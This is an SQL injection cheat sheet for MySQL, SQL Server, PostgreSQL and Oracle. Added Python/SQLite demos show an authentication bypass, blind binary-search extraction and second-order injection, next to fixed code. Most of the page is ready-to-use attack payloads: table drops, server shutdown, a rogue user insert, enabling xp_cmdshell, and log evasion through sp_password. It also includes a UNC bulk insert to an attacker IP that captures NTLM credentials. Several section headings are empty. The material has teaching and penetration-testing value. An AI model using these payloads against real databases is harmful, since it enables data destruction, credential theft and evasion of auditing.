SQL Injection Cheat Sheet, Document Version 1.4

About SQL Injection Cheat Sheet
Currently only for MySQL and Microsoft SQL Server, with some Oracle and some PostgreSQL. Most of the samples are not correct for every single situation: real-world environments differ because of parentheses, different code bases and unexpected, strange SQL statements.
Samples are provided to give the reader a basic idea of a potential attack, and almost every section includes brief information about itself.
M : MySQL
S : SQL Server
P : PostgreSQL
O : Oracle
+ : Possibly all other databases
Examples:
Line Comments
Comments out the rest of the query. Line comments are generally useful for ignoring the rest of the query so you don't have to deal with fixing the syntax.
DROP sampletable;--
Line Comments Sample SQL Injection Attacks
Inline Comments
Comments out the rest of the query by not closing them, or can be used for bypassing blacklisting, removing spaces, obfuscating and determining database versions.
Stacking Queries
Executing more than one query in one request. In PHP-MySQL applications a second, stacked query is not possible through the classic mysql_query() call, which sends a single statement; other client APIs (for example mysqli_multi_query()) do allow it, so whether stacking works depends on the driver, not on MySQL itself.
Stacked SQL Injection Attack Samples
; DROP TABLE members -- (S)
This will run the DROP members SQL statement after the normal SQL query.
If Statements
Get a response based on an if statement. This is one of the key points of Blind SQL Injection, and can also be very useful to test simple things blindly and accurately.
MySQL If Statement
IF(condition, true-part, false-part) (M)
SQL Server If Statement
IF condition true-part ELSE false-part (S)
If Statement SQL Injection Attack Samples
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S)
This will throw a divide by zero error if the current logged-in user is not "sa" or "dbo".
Very useful for bypassing magic_quotes() and similar filters, or even WAFs.
SELECT CHAR(0x66) (S)
SELECT 0x5045 (M) (this is not an integer, it will be a string built from the hex)
SELECT 0x50 + 0x45 (M) (this is an integer now!)
String related operations. These can be quite useful to build up injections which do not use any quotes, to bypass other blacklisting, or to determine the back-end database.
String Concatenation
SELECT login + '-' + password FROM members (S)
*About MySQL "||": if MySQL is running in ANSI mode it will work, but otherwise MySQL treats it as a logical operator and returns 0. The better way is to use the CONCAT() function in MySQL.
These are some direct ways of using strings, but it is always possible to use CHAR() (MS) and CONCAT() (M) to generate strings without quotes.
In MySQL an easy way to generate the hex representation of a string is: SELECT CONCAT('0x',HEX('c:\boot.ini'))
Hex based SQL Injection Samples
ASCII()
Returns the ASCII character value of the leftmost character. A must-have function for Blind SQL Injections.
SELECT ASCII('a')
CHAR()
Converts an integer ASCII value back to a character, so strings can be built without quotes.
SELECT CHAR(64)
Bypassing MD5 Hash Check Example (MSP)
If the application first gets the record by username and then compares the returned MD5 with the MD5 of the supplied password, you need some extra tricks to fool the application and bypass authentication. You can UNION the result with a known username and the MD5 hash of the password you supply. The application will then compare your password against your own supplied MD5 hash instead of the MD5 from the database.
Username : admin ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
Password : 1234
81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
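The two-step check described above, as an added example that is not part of the original cheat sheet. It uses an in-memory SQLite database as a constructed stand-in for the application (the table name `members`, the real password and the function names are assumptions); the payload and the hash are the ones on the page. The vulnerable login is shown next to the parameterised version, which treats the whole payload as an unknown username.

```python
import hashlib
import sqlite3

# Constructed in-memory stand-in for the application's database (not from the page).
# The real password is unknown to the attacker; only its MD5 is stored.
REAL_PASSWORD = "correct-horse-battery"
KNOWN_HASH = "81dc9bdb52d04dc20036dbd8313ed055"   # MD5("1234"), as on the cheat sheet


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (login TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO members VALUES ('admin', ?)",
        (hashlib.md5(REAL_PASSWORD.encode()).hexdigest(),),
    )
    return conn


def login_vulnerable(conn, username, password):
    """Step 1 fetches the row by username with string concatenation (the flaw);
    step 2 compares the stored hash with MD5 of the supplied password."""
    sql = "SELECT login, password FROM members WHERE login = '" + username + "'"
    row = conn.execute(sql).fetchone()
    if row is None:
        return False
    return row[1] == hashlib.md5(password.encode()).hexdigest()


def login_fixed(conn, username, password):
    """Same logic with a bound parameter: the payload is just a username that
    does not exist, so no row comes back."""
    row = conn.execute(
        "SELECT login, password FROM members WHERE login = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    return row[1] == hashlib.md5(password.encode()).hexdigest()


# The cheat sheet's payload, injected through the username field. The WHERE clause
# matches nothing ('admin ' combined with AND 1=0) and the UNION appends a row whose
# hash column is the attacker-chosen MD5; the application's own closing quote
# terminates that string literal.
PAYLOAD_USERNAME = "admin ' AND 1=0 UNION ALL SELECT 'admin', '" + KNOWN_HASH
PAYLOAD_PASSWORD = "1234"


def demo():
    conn = build_db()
    return {
        "hash_is_md5_of_1234": hashlib.md5(b"1234").hexdigest() == KNOWN_HASH,
        "vulnerable_bypassed": login_vulnerable(conn, PAYLOAD_USERNAME, PAYLOAD_PASSWORD),
        "vulnerable_wrong_pw": login_vulnerable(conn, "admin", "guess"),
        "fixed_bypassed": login_fixed(conn, PAYLOAD_USERNAME, PAYLOAD_PASSWORD),
        "fixed_legit": login_fixed(conn, "admin", REAL_PASSWORD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Note that the bypass does not need the stored hash at all: the comparison happens against data the attacker put into the result set, which is why hashing the password client-side or server-side makes no difference here.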
Finding Column Names with HAVING BY - Error Based (S)
Issue the queries in the same order; each error message reveals the next column name, and when no more errors come back you have them all.
Finding how many columns in SELECT query by ORDER BY (MSO+)
Finding the column count with ORDER BY can speed up the UNION SQL Injection process.
Hints,
Finding Column Type
If you are not getting an error, it means the column is numeric.
Microsoft OLE DB Provider for SQL Server error '80040e07' Explicit conversion from data type int to image is not allowed.
You'll get convert() errors before union target errors! So start with convert(), then union.
Simple Insert (MSO+)
'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*
@@version (MS) Version of the database and more details for SQL Server. It's a constant; you can just select it like any other column, without supplying a table name.
More Stored Procedures for SQL Server (S)
MSSQL Bulk Notes
SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/
DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0
HOST_NAME()
IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)
INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"
OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx
You cannot use sub-selects in SQL Server INSERT queries.
SQL Injection in LIMIT (M) or ORDER (MSO)
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;
If the injection is in the second LIMIT argument you can comment it out or use it in your union injection.
Shutdown SQL Server (S)
When you are really pissed off: ';shutdown --
Enabling xp_cmdshell in SQL Server 2005 (S)
By default xp_cmdshell and a couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access you can enable them.
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
Getting User defined Tables
SELECT name FROM sysobjects WHERE xtype = 'U'
Getting Column Names
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
Blind SQL Injections
Extracting the first character of the first user table name with a binary search, one TRUE/FALSE response at a time (S):
TRUE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--
FALSE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--
TRUE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--
FALSE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--
TRUE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--
FALSE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--
TRUE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--
FALSE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--
FALSE : SELECT ID, Username, Email FROM [User] WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--
Since both of the last two queries failed, we know the ASCII value of the table name's first character is 80, which means the first character is P. This is how Blind SQL Injections are exploited with a binary search algorithm. The other well-known way is reading the data bit by bit. Both can be effective in different conditions.
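The binary search above carried through to a whole table name, as an added example that is not part of the original cheat sheet. It also serves the If Statement / Blind SQL Injection section earlier on the page: the only thing the attacker ever learns is whether a record was rendered. An in-memory SQLite database is a constructed stand-in for the target (table and column names are assumptions), so the page's SQL Server functions are replaced by their SQLite equivalents: ASCII() by unicode(), SUBSTRING() by substr(), ISNULL() by ifnull(), sysObjects with xtype 0x55 by sqlite_master with type 'table', and "TOP 1 ... NOT IN (TOP n ...)" by "LIMIT 1 OFFSET n". The code generalises the page's single character to length-then-characters so the loop knows where to stop.

```python
import sqlite3


def build_db():
    # Constructed in-memory stand-in for the target database (not from the page).
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE user (id INTEGER, username TEXT, email TEXT);
        CREATE TABLE products (id INTEGER, name TEXT);
        INSERT INTO user VALUES (1, 'alice', 'alice@example.com');
    """)
    return conn


def page_shows_record(conn, id_param):
    """The vulnerable endpoint: concatenates the id into the query and reveals only
    whether a record was rendered (the page's TRUE / FALSE)."""
    sql = "SELECT id, username, email FROM user WHERE id = " + id_param
    return conn.execute(sql).fetchone() is not None


class BlindOracle:
    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def ask(self, condition):
        # Same shape as the page's payloads: "1 AND <condition>--"
        self.requests += 1
        return page_shows_record(self.conn, "1 AND " + condition + "--")

    def search_int(self, expr, lo, hi):
        """Binary search the integer value of SQL expression `expr` within [lo, hi).
        Each probe halves the interval, so 7 requests resolve one ASCII character."""
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if self.ask(f"({expr}) >= {mid}"):
                lo = mid
            else:
                hi = mid
        return lo

    def extract_string(self, subquery, max_len=256):
        # Recover the length first, then one character per position.
        length = self.search_int(f"length(({subquery}))", 0, max_len)
        chars = []
        for pos in range(1, length + 1):
            code = self.search_int(
                f"ifnull(unicode(substr(({subquery}),{pos},1)),0)", 0, 128
            )
            chars.append(chr(code))
        return "".join(chars)


# The alphabetically first user table: the page's "TOP 1 name FROM sysObjects".
FIRST_TABLE = (
    "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1 OFFSET 0"
)


def demo():
    oracle = BlindOracle(build_db())
    name = oracle.extract_string(FIRST_TABLE)
    return name, oracle.requests


if __name__ == "__main__":
    table, count = demo()
    print(f"recovered table name {table!r} with {count} boolean requests")
```

To move on to the next table, change the OFFSET (the page's "NOT IN (SELECT TOP n ...)"). The request count is what makes this practical: 8 probes for the length plus 7 per character, compared with up to 128 per character when guessing one value at a time.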
Making the Database Wait (Timing Based Blind SQL Injection)
First of all, use this only if it's really blind; otherwise just use 1/0 style errors to identify the difference. Second, be careful with delays longer than 20-30 seconds: the database API connection or the script can time out.
WAITFOR DELAY 'time' (S)
This is just like sleep: wait for the specified time. A CPU-safe way to make the database wait.
WAITFOR DELAY '0:0:10'--
You can also use fractions, like this:
WAITFOR DELAY '0:0:0.51'
Real World Samples
BENCHMARK() (M)
Basically we are abusing this function to make MySQL wait a bit. Be careful, you will exhaust the web server's limits very fast!
BENCHMARK(howmanytimes, do this)
Real World Samples
pg_sleep(seconds) (P)
Sleep for supplied seconds.
SQL Server - sp_password log bypass (S)
SQL Server trace/Profiler replaces the text of any batch that includes sp_password with a comment, for security reasons(!). So if you add --sp_password to your queries they will not show up in the SQL Server logs (of course they will still be in the web server logs, so use POST if possible).
Reading Data Bit by Bit (M)
Reads the top bit of the first character of user() and turns it into a timing difference with BENCHMARK():
select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );
Potentially Useful MySQL Functions
Second Order SQL Injections
Basically you put an SQL Injection in one place and expect it to be used unfiltered in another action. This is a common hidden-layer problem.
Name : ' + (SELECT TOP 1 password FROM users ) + '
Email : xyz@xyz.com
If the application uses the name field in an unsafe stored procedure, function, process etc., it will insert the first user's password as your name, etc.
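The two actions described above, as an added example that is not part of the original cheat sheet. An in-memory SQLite database stands in for the application (the `users` and `activity` tables, the stored admin hash and the function names are constructed assumptions), so the page's SQL Server payload `' + (SELECT TOP 1 password FROM users) + '` is written with SQLite's `||` concatenation and `ORDER BY id LIMIT 1` in place of TOP 1. The registration step is parameterised and therefore looks safe; the second step trusts what it reads back from its own database and is where the payload fires.

```python
import sqlite3

# The page's payload in SQLite syntax: closes the literal, concatenates a scalar
# subquery, and reopens the literal so the statement stays syntactically valid.
PAYLOAD_NAME = "' || (SELECT password FROM users ORDER BY id LIMIT 1) || '"

# Constructed stand-in for the admin's stored hash (not from the page).
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, name TEXT, password TEXT);
        CREATE TABLE activity (message TEXT);
    """)
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (ADMIN_HASH,))
    return conn


def register(conn, user_id, name):
    """First action: correctly parameterised, so the payload is stored verbatim
    and nothing happens yet."""
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", (user_id, name, "irrelevant"))


def _last_message(conn):
    return conn.execute(
        "SELECT message FROM activity ORDER BY rowid DESC LIMIT 1"
    ).fetchone()[0]


def log_activity_vulnerable(conn, user_id):
    """Second action (the hidden layer): a value that came out of the database is
    treated as trusted and concatenated into a new statement."""
    (name,) = conn.execute(
        "SELECT name FROM users WHERE id = ?", (user_id,)
    ).fetchone()
    conn.execute("INSERT INTO activity VALUES ('login by " + name + "')")
    return _last_message(conn)


def log_activity_fixed(conn, user_id):
    """Data read back from the database is still untrusted input: bind it."""
    (name,) = conn.execute(
        "SELECT name FROM users WHERE id = ?", (user_id,)
    ).fetchone()
    conn.execute("INSERT INTO activity VALUES (?)", ("login by " + name,))
    return _last_message(conn)


def demo():
    conn = build_db()
    register(conn, 2, PAYLOAD_NAME)
    return {
        "stored_name": conn.execute(
            "SELECT name FROM users WHERE id = 2"
        ).fetchone()[0],
        "vulnerable": log_activity_vulnerable(conn, 2),
        "fixed": log_activity_fixed(conn, 2),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable path writes the admin's password hash into the activity message, where the attacker can read it back through whatever shows that message. Input validation at the registration form does not help here; the fix is to bind every value at the point where it is used.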
Bulk insert from a UNC Share (S)
This attack can help you get the NTLM credentials (challenge/response, crackable offline) of the Windows account SQL Server runs as, but your inbound connection will possibly be firewalled. It can be very useful in internal penetration tests. We force SQL Server to connect to our Windows UNC share and capture the NTLM session data with a tool like Cain & Abel.
bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'
Check out the Bulk Insert Reference to understand how you can use bulk insert.
Since these notes were collected from several different sources and personal experience over several years, I may have missed some references. If you believe I missed yours or someone else's, drop me an email (ferruh-at-mavituna.com) and I'll update it as soon as possible.
Advanced SQL Injection In SQL Applications, Chris Anley
More Advanced SQL Injection In SQL Applications, Chris Anley
Blindfolded SQL Injection, Ofer Maor - Amichai Shulman
Hackproofing MySQL, Chris Anley
Database Hacker's Handbook, David Litchfield, Chris Anley, John Heasman, Bill Grindlay
Upstairs Team!